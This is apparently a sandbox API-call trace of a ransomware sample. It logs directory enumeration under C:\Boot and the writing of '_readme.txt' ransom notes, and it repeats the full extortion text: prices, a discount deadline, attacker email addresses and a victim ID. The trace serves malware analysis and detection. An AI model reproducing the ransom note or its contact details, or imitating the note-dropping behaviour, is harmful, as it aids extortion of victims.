overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.764] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.765] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.765] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.790] CloseHandle (hObject=0x690) returned 1 [0173.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.790] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5bda40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5bda40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.790] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5bda40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5bda40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.790] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.790] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5bda40, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5bda40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.791] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5bda40, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5bda40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.791] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.791] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.793] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0173.793] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.793] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.793] PathFindFileNameW (pszPath="") returned="" [0173.793] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.794] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.794] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.794] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.794] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0173.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.794] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0173.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.795] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.795] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.795] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.795] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key 